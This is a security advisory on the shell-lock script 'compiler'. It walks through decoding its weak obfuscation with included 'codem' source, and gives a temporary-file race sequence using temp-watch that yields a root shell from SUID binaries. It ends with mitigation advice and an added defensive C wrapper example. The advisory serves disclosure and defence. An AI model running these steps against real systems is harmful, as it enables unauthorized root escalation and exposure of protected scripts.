COMMAND
shell-lock
SYSTEMS AFFECTED
Those running shell-lock (available for all UNIX platforms)
PROBLEM
The following is based on a L0pht Security Advisory. (a) A trivial
encoding mechanism is used for obfuscating the shell code in the
"compiled" binary. Anyone with read permissions to the file in
question can decode and retrieve the original shell code. Another
vulnerability exists where the user can retrieve the un-encoded
shell script without needing to actually decode the binary.
(b) The vendors claim the program to be useful in creating SUID
binaries on systems that do not honor SUID shell scripts and also
to protect against the security problems with SUID shell scripts.
As it turns out any shell-lock "compiled" program that is SUID
root will allow any user to execute any program with root
privileges.
Example (a'):
[slaughter-house] cat q.sh
#!/bin/sh
echo "hi there... this is a test"
[slaughter-house] shell-lock -o q q.sh
SHELL-LOCK(tm)
Shell Script Security Software
Copyright (C) 1989-1999
Cactus International, Inc.
(Version: 2.1.1.1 7/19/99)
Converting files: q.sh
Compiling.....DEMO Version...
Success!!
The shell script "q" has been compiled and placed in "q"
Conversion successful!!
[slaughter-house] file q
q: ELF 32-bit MSB executable SPARC Version 1, dynamically linked, stripped
[slaughter-house] ./q
hi there... this is a test
[slaughter-house] strings ./q
(some stuff... not the ascii from the shell script)
[slaughter-house] ./codem -d -i ./q
#!/bin/sh
rm -f $0 2>/dev/null
echo "hi there... this is a test"
Example (a''):
[slaughter-house] temp-watch -d /var/tmp -C 'q*' -D ./ &
[1] 22971
[slaughter-house] nice +10 ./q
hi there... this is a test
[slaughter-house] more q*
#!/bin/sh
rm -f $0 2>/dev/null
echo "hi there... this is a test"
Example (b):
# ls -l q
-rwxr-xr-x 1 mudge other 50753 Sep 28 14:24 q
# chown root q
# chmod 4755 q
# exit
[slaughter-house] id
uid=789(mudge) gid=1(other)
[slaughter-house] ls -l q
-rwsr-xr-x 1 root other 50753 Sep 28 14:24 q
[slaughter-house] temp-watch -X '^q*' -R /bin/sh -d /var/tmp &
[1] 23071
[slaughter-house] nice +10 ./q
# id
uid=0(root) gid=1(other)
So, what's shell-lock? Have you ever seen the big advertisements
run in the back of SysAdmin magazine? You know, the ones with the
Texan with the huge hat and sunglasses? Well, that is Cactus
software. The program "shell-lock" is used to create ELF binaries
from shell scripts. Ostensibly called a Shell Script Compiler,
the literature states that the program also hides the original
shell code so as not to be returnable through running strings(1)
on the binary.
A quick decompilation shows that the encoding and decoding
routines look as follows:
0x16194 : inc %i4 Increment the counter
0x16198 : srl %i4, 0x1f, %o0 {
0x1619c : add %i4, %o0, %o0 { testing for odd v even
0x161a0 : andn %o0, 1, %o0 {
0x161a4 : cmp %i4, %o0 {
0x161a8 : bne 0x161b8 If they match
0x161ac : add %o1, 0x63, %o2 add 0x63 to the value
0x161b0 : b 0x161c0 else
0x161b4 : ld [ %i1 ], %o0
0x161b8 : add %o1, 0x44, %o2 add 0x44 to the value
0x161bc : ld [ %i1 ], %o0
0x161c0 : deccc %o0
0x161c4 : bneg 0x16228
0x161c8 : st %o0, [ %i1 ]
0x161cc : ld [ %i1 + 4 ], %o0
0x161d0 : add %o0, 1, %o1
0x161d4 : st %o1, [ %i1 + 4 ]
0x161d8 : and %o2, 0xff, %o1 and with 0xff (hey it's
0x161dc : stb %o1, [ %o0 ] ascii printable after all)
0x161e0 : ld [ %i0 ], %o0
0x161e4 : deccc %o0
This basically boils down to the following C code snippet, where
len is the number of bytes in the buffer.
for (i = 0; i < len; i++) {
    if (!(i % 2))
        outbuff[i] = (inbuff[i] + 0x44) & 0xff;
    else
        outbuff[i] = (inbuff[i] + 0x63) & 0xff;
}
Conversely the decoding subtracts 0x44 and 0x63 alternately. What
shell-lock does when it creates the initial "compiled" binary
from the shell script is to add the line "rm -f $0 2>/dev/null" to
the bourne shell script (or "unlink $ZERO ;
$ZERO=ENV{'X0'};\n.\nw\nq" for a perl script) and encodes the
entire file. This is then copied into the data section of a
skeleton binary file. The binary file, upon execution, reads the
encoded data section and writes it out to a temporary file
(*note: the default location is /var/tmp though it will follow
the TMPDIR variable) and then execve's /bin/sh to call the
program.
The first method of extracting the data is to use the attached
program (codem) to read the binary and run the data section
through the decoding routine.
The second method of extraction is to use the current version of
temp-watch (available freely from the L0pht advisories site) to
make a copy of the temporary file containing the original shell
code that is created when the binary is run.
The SUID root vulnerability lies in the fact that while the
temporary file is created without any special permissions, the
file exec'ing it is running as root. Thus, as soon as the
temporary file appears, a race condition exists in which the user
can unlink the file and replace it with a different file or a
symlink to the program they want executed. This is accomplished in
the above example with the program temp-watch using arguments
specifying the replacement of the temporary file with a link to
/bin/sh. Code follows. temp-watch can be found at
http://www.l0pht.com/advisories/l0pht-watch.tar.gz
Below you'll find that mimed and codem after that.
And now codem:
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>

void usage(char *);

int main(int argc, char *argv[]){
    int fdin, fdout;
    int i, c;
    ssize_t nread;
    long total = 0;         /* bytes processed so far, keeps the parity right */
    int cryptFlag=0, decryptFlag=0;
    int seekOffset=50688;   /* default offset of the encoded data section */
    char *infile=NULL, *outfile=NULL;
    char inbuff[8192];
    char outbuff[8192];

    while ((c = getopt(argc, argv, "cdhi:o:s:")) != -1){
        switch (c) {
        case 'c':
            cryptFlag++;
            break;
        case 'd':
            decryptFlag++;
            break;
        case 'i':
            infile = optarg;
            break;
        case 'o':
            outfile = optarg;
            break;
        case 's':
            seekOffset = atoi(optarg);
            break;
        case 'h':
            usage(argv[0]);
            break;
        default:
            usage(argv[0]);
            break;
        }
    }

    if ((cryptFlag && decryptFlag) || (!cryptFlag && !decryptFlag)){
        printf("Must specify either -c or -d but not both\n");
        usage(argv[0]);
    }

    if (infile){
        fdin = open(infile, O_RDONLY);
        if (fdin == -1){
            perror("open infile");
            exit(1);
        }
    } else {
        fdin = STDIN_FILENO;
    }

    if (outfile){
        /* O_EXCL: refuse to overwrite an existing file */
        fdout = open(outfile, O_WRONLY|O_CREAT|O_EXCL, 0644);
        if (fdout == -1){
            perror("open outfile");
            exit(1);
        }
    } else {
        fdout = STDOUT_FILENO;
    }

    memset(inbuff, '\0', sizeof(inbuff));
    memset(outbuff, '\0', sizeof(outbuff));

    /* when decoding, skip the skeleton binary and start at the data section */
    if (decryptFlag)
        lseek(fdin, seekOffset, SEEK_SET);

    while ((nread = read(fdin, inbuff, sizeof(inbuff))) > 0){
        for (i=0; i < nread ; i++){
            /* even positions use 0x44, odd positions use 0x63 */
            if (cryptFlag){
                if (!((total + i) % 2))
                    outbuff[i] = (inbuff[i] + 0x44) & 0xff;
                else
                    outbuff[i] = (inbuff[i] + 0x63) & 0xff;
            } else {
                if (!((total + i) % 2))
                    outbuff[i] = inbuff[i] - 0x44;
                else
                    outbuff[i] = inbuff[i] - 0x63;
            }
        }
        write(fdout, outbuff, nread);
        total += nread;
    }

    close(fdin);
    close(fdout);
    return(0);
}

void usage(char *progname){
    char *c;

    /* print only the base name of the program */
    c = strrchr(progname, '/');
    if (c)
        c++;
    else
        c = progname;
    printf("Usage: %s -cd[h] [-i infile] [-o outfile] [-s seek] \n", c);
    printf(" Shell-lock {en,de}coder by mudge@l0pht.com and _lumpy\n");
    printf(" -c encrypt\n");
    printf(" -d decrypt\n");
    printf(" -h help\n");
    printf(" -i <file> input file\n");
    printf(" -o <file> output file\n");
    printf(" -s <offset> seek offset [defaults to 50688]\n");
    exit(1);
}
SOLUTION
Do not take candy or accept car rides from strangers. If
something seems too good to be true it probably is. There are
few magic solutions that negate having to do things right in the
first place.
If you need a shell script to run with root privileges consider
writing it in C or using something like sudo.
Do not rely upon shell-lock as an obfuscation mechanism for hiding
the internals of shell scripts in 'compiled' binaries.
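An added example (not from the L0pht advisory and not Cactus code) of how a C wrapper can avoid the temporary-file race described under PROBLEM: the script is written to a mkstemp() file and /bin/sh reads it from the already-open descriptor, so no name in a shared directory is resolved again after the write. The function names and the /tmp/wrapper-demo path are assumptions, and the example covers only the temporary-file race, not the other hazards of SUID programs.

```c
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Write the script to a mkstemp() file (unpredictable name, O_EXCL) and
 * return the still-open descriptor, rewound to offset 0, or -1 on error. */
int create_private_script(char *path_template, const char *body)
{
    size_t len = strlen(body);
    int fd = mkstemp(path_template);
    if (fd == -1) return -1;
    if (fchmod(fd, S_IRUSR | S_IWUSR) == -1 ||
        write(fd, body, len) != (ssize_t)len ||
        lseek(fd, 0, SEEK_SET) == -1) {
        close(fd);
        unlink(path_template);
        return -1;
    }
    return fd;
}

/* Return 1 only if path still names the regular file behind fd. A symlink
 * or another inode there means the name was swapped (useful for logging;
 * execution must still go through fd, never through the path). */
int path_still_matches(int fd, const char *path)
{
    struct stat by_fd, by_path;
    if (fstat(fd, &by_fd) == -1 || lstat(path, &by_path) == -1)
        return 0;
    return S_ISREG(by_path.st_mode) && by_path.st_nlink == 1 &&
           by_fd.st_dev == by_path.st_dev && by_fd.st_ino == by_path.st_ino;
}

int main(void)
{
    char path[] = "/tmp/wrapper-demo-XXXXXX";   /* constructed sample path */
    int fd = create_private_script(path, "echo \"hi there... this is a test\"\n");
    if (fd == -1) { perror("create_private_script"); return 1; }
    if (!path_still_matches(fd, path))
        fprintf(stderr, "warning: %s was replaced after creation\n", path);
    unlink(path);                    /* the name is no longer needed */
    if (dup2(fd, STDIN_FILENO) == -1) { perror("dup2"); return 1; }
    execl("/bin/sh", "sh", "-s", (char *)NULL);  /* sh reads the open fd */
    perror("execl");
    return 1;
}
```

Because the interpreter is handed the descriptor on stdin, replacing the name in the temporary directory changes nothing about what gets executed.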